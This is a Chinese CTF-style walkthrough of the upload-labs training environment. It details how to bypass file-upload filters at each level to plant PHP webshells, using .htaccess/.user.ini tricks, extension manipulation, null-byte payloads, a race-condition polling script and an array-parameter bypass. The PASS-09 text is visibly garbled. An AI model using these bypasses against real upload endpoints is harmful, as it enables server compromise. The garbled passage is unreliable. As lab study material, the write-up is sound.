upload-labs通关

upload-labs通关

shell ===


目录

  • upload-labs通关
    • PASS-01、PASS-02
    • PASS-03
    • PASS-04
    • PASS-05
    • PASS-06
    • PASS-07
    • PASS-08
    • PASS-09
    • PASS-10
    • PASS-11
    • PASS-12
    • PASS-13
    • PASS-14
    • PASS-15
    • PASS-16
    • PASS-17
    • PASS-18
    • PASS-19
    • PASS-20
    • PASS-21

shell能上传并能解析就算成功


PASS-01、PASS-02

图片马抓包改后缀就行

upload-labs通关_第1张图片

PASS-03

根据源码分析,直接上传PHP4、PHP5或phtml文件就行,只不过在Apache配置文件需要增加PHP4、PHP5能够解析成php的语句

PASS-04

过滤的很全,但没有过滤.htaccess和.user.ini,两者都能配合图片马可以来发组合拳
.htaccess文件:

SetHandler application/x-httpd-php

图片马:

GIF89a
auto_prepend_file=hack.jpg

PASS-05

上传.user.ini文件,配合图片马hack.jpg食用
.user.ini:

GIF89a
auto_prepend_file=hack.jpg

PASS-06

源码没有缺少将后缀名全改小写的函数,所有可以通过部分大写或全大写的形式改后缀,如Php、PHP
upload-labs通关_第2张图片

PASS-07

源码没有处理文件名末尾的空格,可以通过后缀加空格的方式绕过黑名单,貌似win和linux都行
upload-labs通关_第3张图片

PASS-08

源码没有处理文件名末尾的.号,可以通过后缀加.的方式绕过黑名单,只能在win上这么绕过

upload-labs通关_第4张图片

PASS-09

源码没有处理文件名末尾的:: D A T A 号 , 后 缀 名 后 加 上 : : DATA号,后缀名后加上:: DATA::DATA绕过

upload-labs通关_第5张图片

PASS-10

源码对某些字符只是过滤一次,可以根据代码的顺序来构造php后缀

upload-labs通关_第6张图片

PASS-11

转换黑名单上的字符串为空格,双写绕过,如pphphp
upload-labs通关_第7张图片

PASS-12

php 版本 < 5.3.4且php的参数magic_quotes_gpc必须关闭
payload:

/upload-labs/Pass-12/index.php?save_path=../upload/h.php%00

upload-labs通关_第8张图片

PASS-13

payload: ../upload/h.php+
并且把+的hex值有2d改为00
upload-labs通关_第9张图片

PASS-14

上传一张图片马,并获取图片地址,使用提供的文件包含漏洞解析,最后使用蚁剑连接
payload: http://192.168.1.28/upload-labs/include.php?file=upload/5020221205182144.jpg

upload-labs通关_第10张图片

upload-labs通关_第11张图片

PASS-15

同14

PASS-16

不知为何提交图片就不动了,跳了

PASS-17

对图片上传进行二次渲染
可以试着观察经过和未经过imagecreatefromjpeg函数的图片数据,把其中没有变化的数据替换换成一句话木马

PASS-18

条件竞争,记得先退杀毒软件,几次被失败被搞懵了
解析源码,会发现是先上传任意文件到指定文件夹,在判断是否合法,合法则保留,不合法则不保留(ulink函数),
所以可以利用php文件成功上传后还没被删除这个时间戳,直接访问这个php文件,达到执行任意php代码的目的
由于计算机处理文件速度一般比手速快,所以使用脚本的方式来访问

import requests
import time

url = "http://192.168.1.28/upload-labs/upload/make_shell_php.php"

while (1):
    res = requests.get(url)
    if res.status_code == 200:
        print("true")
        break
    else:
        print("false")

upload-labs通关_第12张图片
upload-labs通关_第13张图片

PASS-19

图片马配合文件包含

PASS-20

文件名是可以自定义的,但是要经过黑名单,后缀改.PHP或者.php/.都可以绕过,也可以使用00截断,但环境要允许

PASS-21

白名单+数组绕过

//检查文件名
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
if (!is_array($file)) {
    $file = explode('.', strtolower($file));
}

这里其实直接传一个数组进去,这样就可以绕过这个if执行的字符串转数组的过程
修改包信息
save_name[0] = upload-21.php
save_name[2] = jpg
相当于即传进去一个数组[‘upload-21.php’,‘’,‘jpg’]

$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
    $msg = "禁止上传该后缀文件!";
}

这里会取数组末尾的元素去白名单里判断是否合法,所以数组末尾的元素必须是白名单里某个元素

$file_name = reset($file) . '.' . $file[count($file) - 1];
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
    $msg = "文件上传成功!";
    $is_upload = true;
} else {
    $msg = "文件上传失败!";
}

由于函数COUNT在计数时,将把数值型的数字计算进去;但是错误值、空值、逻辑值、文字则被忽略。
所以不会考虑这个空值,最后等于2,最后追加的是数组的第二位空值,从而绕过了jpg后缀
所以:

$file_name = reset($file) . '.' . $file[count($file) - 1] = 'upload-21.php' + '.' + '' = upload-21.php

最后在指定目录生成upload-21.php文件
upload-labs通关_第14张图片

你可能感兴趣的:(日常练习,CTF,apache,php,服务器,web安全)